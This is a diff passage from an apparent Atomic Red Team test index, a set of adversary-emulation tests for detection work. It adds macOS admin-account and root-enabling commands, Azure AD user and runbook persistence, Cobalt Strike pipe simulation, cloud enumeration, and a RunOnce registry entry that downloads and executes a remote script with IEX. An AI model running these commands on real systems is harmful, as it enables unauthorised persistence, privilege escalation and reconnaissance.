+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Az -Scope CurrentUser -Force
+
+          '
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-AzAccount -Credential $creds
+          New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+        name: powershell
+        elevation_required: false
   T1053.002:
     technique:
       x_mitre_platforms:
@@ -42474,6 +42658,45 @@ privilege-escalation:
         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
     - name: WinPwn - Loot local Credentials - powerhell kittie
       auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
       description: Loot local Credentials - powerhell kittie technique via function
@@ -45777,11 +46000,6 @@ execution:
         '
       supported_platforms:
       - containers
-      input_arguments:
-        command:
-          description: Command to run
-          type: string
-          default: cat
       dependencies:
       - description: 'docker must be installed
 
@@ -47765,7 +47983,158 @@ execution:
       - User
       - SYSTEM
       x_mitre_remote_support: true
-    atomic_tests: []
+      identifier: T1559
+    atomic_tests:
+    - name: Cobalt Strike Artifact Kit pipe
+      auto_generated_guid: bd13b9fc-b758-496a-b81a-397462f82c72
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          1
+
+          '
+        name: command_prompt
+    - name: Cobalt Strike Lateral Movement (psexec_psh) pipe
+      auto_generated_guid: 830c8b6c-7a70-4f40-b975-8bbe74558acd
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          2
+
+          '
+        name: command_prompt
+    - name: Cobalt Strike SSH (postex_ssh) pipe
+      auto_generated_guid: d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          3
+
+          '
+        name: command_prompt
+    - name: Cobalt Strike post-exploitation pipe (4.2 and later)
+      auto_generated_guid: 7a48f482-246f-4aeb-9837-21c271ebf244
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          4
+
+          '
+        name: command_prompt
+    - name: Cobalt Strike post-exploitation pipe (before 4.2)
+      auto_generated_guid: 8dbfc15c-527b-4ab0-a272-019f469d367f
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          5
+
+          '
+        name: command_prompt
   T1204.003:
     technique:
       x_mitre_platforms:
@@ -60051,7 +60420,7 @@ persistence:
       executor:
         command: |
           $RunOnceKey = "#{reg_key_path}"
-          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
+          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
         cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
           -Force -ErrorAction Ignore
 
@@ -60101,7 +60470,8 @@ persistence:
     - name: Suspicious bat file run from startup Folder
       auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e
       description: |
-        bat files can be placed in and executed from the startup folder to maintain persistance.
+        bat files can be placed in and executed from the startup folder to maintain persistance
+
         Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
         folder and will also run when the computer is restarted and the user logs in.
       supported_platforms:
@@ -60449,6 +60819,95 @@ persistence:
           '
         name: sh
         elevation_required: false
+    - name: Azure AD - Create a new user
+      auto_generated_guid: e62d23ef-3153-4837-8625-fa4a3829134d
+      description: Creates a new user in Azure AD. Upon successful creation, a new
+        user will be created. Adversaries create new users so that their malicious
+        activity does not interrupt the normal functions of the compromised users
+        and can remain undetected for a long time.
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        username:
+          description: Display name of the new user to be created in Azure AD
+          type: string
+          default: atomicredteam
+        userprincipalname:
+          description: User principal name (UPN) for the new Azure user being created
+            format email address
+          type: String
+          default: atomicredteam@yourdomain.com
+        password:
+          description: Password for the new Azure AD user being created
+          type: string
+          default: reallylongcredential12345ART-ydsfghsdgfhsdgfhgsdhfg
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Check if AzureAD PowerShell module is installed
+        prereq_command: Get-InstalledModule -Name AzureAD
+        get_prereq_command: echo "use the following to install AzureAD PowerShell
+          module - Install-Module -Name AzureAD -Scope CurrentUser -Repository PSGallery
+          -Force"
+      - description: Check if AzureAD PowerShell module is installed
+        prereq_command: Update the input arguments so the userprincipalname value
+          is accurate for your environment
+        get_prereq_command: echo "Update the input arguments in the .yaml file so
+          that the userprincipalname value is accurate for your environment"
+      executor:
+        command: "Connect-AzureAD\n$userprincipalname = \"#{userprincipalname}\"\n$username
+          = \"#{username}\"      \n$password = \"#{password}\"\n$PasswordProfile =
+          New-Object -TypeName Microsoft.Open.AzureAD.Model.PasswordProfile\n$PasswordProfile.Password
+          = $password\nNew-AzureADUser -DisplayName $username -PasswordProfile $PasswordProfile
+          -UserPrincipalName $userprincipalname -AccountEnabled $true -MailNickName
+          $username      "
+        cleanup_command: Remove-AzureADUser -ObjectId "#{userprincipalname}"
+        name: powershell
+    - name: Azure AD - Create a new user via Azure CLI
+      auto_generated_guid: 228c7498-be31-48e9-83b7-9cb906504ec8
+      description: Creates a new user in Azure AD via the Azure CLI. Upon successful
+        creation, a new user will be created. Adversaries create new users so that
+        their malicious activity does not interrupt the normal functions of the compromised
+        users and can remain undetected for a long time.
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        username:
+          description: Display name of the new user to be created in Azure AD
+          type: string
+          default: atomicredteam
+        userprincipalname:
+          description: User principal name (UPN) for the new Azure user being created
+            format email address
+          type: String
+          default: atomicredteam@yourdomain.com
+        password:
+          description: Password for the new Azure AD user being created
+          type: string
+          default: reallylongcredential12345ART-ydsfghsdgfhsdgfhgsdhfg
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Check if Azure CLI is installed and install manually
+        prereq_command: az account list
+        get_prereq_command: echo "use the following to install the Azure CLI manually
+          https://aka.ms/installazurecliwindows"
+      - description: Check if Azure CLI is installed and install via PowerShell
+        prereq_command: az account list
+        get_prereq_command: echo "use the following to install the Azure CLI $ProgressPreference
+          = 'SilentlyContinue'; Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows
+          -OutFile .\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I
+          AzureCLI.msi /quiet'; Remove-Item .\AzureCLI.msi"
+      - description: Update the userprincipalname to meet your requirements
+        prereq_command: Update the input arguments so the userprincipalname value
+          is accurate for your environment
+        get_prereq_command: echo "Update the input arguments in the .yaml file so
+          that the userprincipalname value is accurate for your environment"
+      executor:
+        command: "az login\n$userprincipalname = \"#{userprincipalname}\"\n$username
+          = \"#{username}\"      \n$password = \"#{password}\"\naz ad user create
+          --display-name $username --password $password --user-principal-name $userprincipalname\naz
+          ad user list --filter \"displayname eq 'atomicredteam'\"     "
+        cleanup_command: az ad user delete --id
+        name: powershell
   T1098:
     technique:
       x_mitre_platforms:
@@ -60680,7 +61139,8 @@ persistence:
           type: string
           default: p4sswd
         user_principal_name:
-          description: Name of the targeted user (user principal)
+          description: Display Name, or User Principal Name, of the targeted user
+            principal
           type: string
           default: SuperUser
         role_name:
@@ -60705,7 +61165,7 @@ persistence:
           $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
           Connect-AzureAD -Credential $Credential
 
-          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
           if ($user -eq $null) { Write-Warning "User not found"; exit }
           $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
           if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -60717,7 +61177,7 @@ persistence:
           $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
           Connect-AzureAD -Credential $Credential -ErrorAction Ignore
 
-          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
           if ($user -eq $null) { Write-Warning "User not found"; exit }
           $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
           if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -60819,7 +61279,8 @@ persistence:
           type: string
           default: p4sswd
         user_principal_name:
-          description: Name of the targeted user (user principal)
+          description: Display Name, or User Principal Name, of the targeted user
+            principal
           type: string
           default: SuperUser
         role_name:
@@ -60848,7 +61309,7 @@ persistence:
           $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
           Connect-AzAccount -Credential $Credential
 
-          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
           if ($user -eq $null) { Write-Warning "User not found"; exit }
           $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
           if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
@@ -60863,7 +61324,7 @@ persistence:
           $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
           Connect-AzAccount -Credential $Credential -ErrorAction Ignore
 
-          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
           if ($user -eq $null) { Write-Warning "User not found"; exit }
           $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
           if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
@@ -66016,6 +66477,55 @@ persistence:
           this atomic test : https://cloud.google.com/sdk/docs/install"
 
           '
+    - name: Azure Persistence Automation Runbook Created or Modified
+      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+      description: |
+        Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+        Automation runbook to execute malicious code and maintain persistence in their target's environment.
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure username
+          type: String
+          default: 
+        password:
+          description: Azure password
+          type: String
+          default: 
+        resource_group:
+          description: Name of the resource group
+          type: String
+          default: 
+        runbook_name:
+          description: Name of the runbook name
+          type: String
+          default: 
+        automation_account_name:
+          description: Name of the automation account name
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Install-Module -Name Az
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Az -Scope CurrentUser -Force
+
+          '
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-AzAccount -Credential $creds
+          New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+        name: powershell
+        elevation_required: false
   T1053.002:
     technique:
       x_mitre_platforms:
@@ -66704,6 +67214,45 @@ persistence:
         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
     - name: WinPwn - Loot local Credentials - powerhell kittie
       auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
       description: Loot local Credentials - powerhell kittie technique via function
@@ -69950,7 +70499,7 @@ collection:
           $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
           $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
           Connect-ExchangeOnline -Credential $creds
-          New-InboxRule -Name "#{rule_name}" -ForwardTo "{#forwarding_email}"
+          New-InboxRule -Name "#{rule_name}" -ForwardTo "#{forwarding_email}"
         cleanup_command: |
           $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
           $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
@@ -84142,6 +84691,36 @@ discovery:
           -FilePath .\\CurrentUserObject.txt\n"
         cleanup_command: 'Remove-Item -Path .\CurrentUserObject.txt -Force
 
+          '
+        name: powershell
+    - name: System Discovery - SocGholish whoami
+      auto_generated_guid: 3d257a03-eb80-41c5-b744-bb37ac7f65c7
+      description: "SocGholish performs whoami discovery commands and outputs the
+        results to a tmp file. \nThe test will generate a filename similar to the
+        random one generated during execution and write the file to AppData\\Temp.\n\nReference:
+        https://redcanary.com/threat-detection-report/threats/socgholish/\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        output_path:
+          description: Location of output file
+          type: string
+          default: "$env:temp"
+      executor:
+        command: |
+          $TokenSet = @{
+            U = [Char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
+            N = [Char[]]'0123456789'
+          }
+          $Upper = Get-Random -Count 5 -InputObject $TokenSet.U
+          $Number = Get-Random -Count 5 -InputObject $TokenSet.N
+          $StringSet = $Upper + $Number
+          $rad = (Get-Random -Count 5 -InputObject $StringSet) -join ''
+          $file = "rad" + $rad + ".tmp"
+
+          whoami.exe /all >> #{output_path}\$file
+        cleanup_command: 'Remove-Item -Path $env:temp\rad*.tmp -Force
+
           '
         name: powershell
   T1613:
@@ -84708,10 +85287,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -default -s base lockoutduration lockoutthreshold
           lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength
@@ -84737,10 +85315,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -sc admincountdmp\n"
         name: command_prompt
@@ -84764,10 +85341,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -f (objectcategory=person)\n"
         name: command_prompt
@@ -84791,10 +85367,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -sc exchaddresses\n"
         name: command_prompt
@@ -84982,15 +85557,6 @@ discovery:
         code 4776 from the domain controller and stores the ouput in C:\\temp. [Reference](https://www.reliaquest.com/blog/socgholish-fakeupdates/)\n"
       supported_platforms:
       - windows
-      input_arguments:
-        Domain:
-          description: Domain that is being tested against
-          type: string
-          default: "$env:USERDOMAIN"
-        DomainController:
-          description: Domain Controller that is being tested against
-          type: string
-          default: "$env:UserDnsDomain"
       executor:
         command: wmic /node:$env:UserDnsDomain process call create 'wevtutil epl Security
           C:\Temp\ntlmusers.evtx /q:Event[System[(EventID=4776)]]'
@@ -85636,6 +86202,7 @@ discovery:
           '
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -f (objectcategory=group)\n"
@@ -87399,7 +87966,78 @@ discovery:
       - 'Cloud Storage: Cloud Storage Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1580
+    atomic_tests:
+    - name: AWS - EC2 Enumeration from Cloud Instance
+      auto_generated_guid: 99ee161b-dcb1-4276-8ecb-7cfdcb207820
+      description: 'This atomic runs several API calls (sts:GetCallerIdentity, s3:ListBuckets,
+        iam:GetAccountSummary, iam:ListRoles, iam:ListUsers, iam:GetAccountAuthorizationDetails,
+        ec2:DescribeSnapshots, cloudtrail:DescribeTrails, guardduty:ListDetectors)
+        from the context of an EC2 instance role. This simulates an attacker compromising
+        an EC2 instance and running initial discovery commands on it. This atomic
+        test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team).
+        Stratus Red Team is a self-contained binary. You can use it to easily detonate
+        offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.discovery.ec2-enumerate-from-instance/
+
+        '
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        stratus_path:
+          description: Path of stratus binary
+          type: path
+          default: "$PathToAtomicsFolder/T1580/src"
+        aws_region:
+          description: AWS region to detonate
+          type: string
+          default: us-west-2
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Stratus binary must be present at the (#{stratus_path}/stratus)
+
+          '
+        prereq_command: 'if test -f "#{stratus_path}/stratus"; then exit 0; else exit
+          1; fi
+
+          '
+        get_prereq_command: "if [ \"$(uname)\" = \"Darwin\" ]\nthen DOWNLOAD_URL=$(curl
+          -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
+          | grep browser_download_url | grep -i Darwin_x86_64 | cut -d '\"' -f 4);
+          wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n
+          \ tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nelif
+          [ \"$(expr substr $(uname) 1 5)\" = \"Linux\" ]\nthen DOWNLOAD_URL=$(curl
+          -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
+          | grep browser_download_url | grep -i linux_x86_64 | cut -d '\"' -f 4);
+          wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n
+          \ tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nfi
+          \n"
+      - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+          '
+        prereq_command: 'cat ~/.aws/credentials | grep "default"
+
+          '
+        get_prereq_command: 'echo "Please install the aws-cli and configure your AWS
+          default profile using: aws configure"
+
+          '
+      executor:
+        command: |
+          export AWS_REGION=#{aws_region}
+          cd #{stratus_path}
+          echo "Stratus: Start Warmup."
+          ./stratus warmup aws.discovery.ec2-enumerate-from-instance
+          echo "Stratus: Start Detonate."
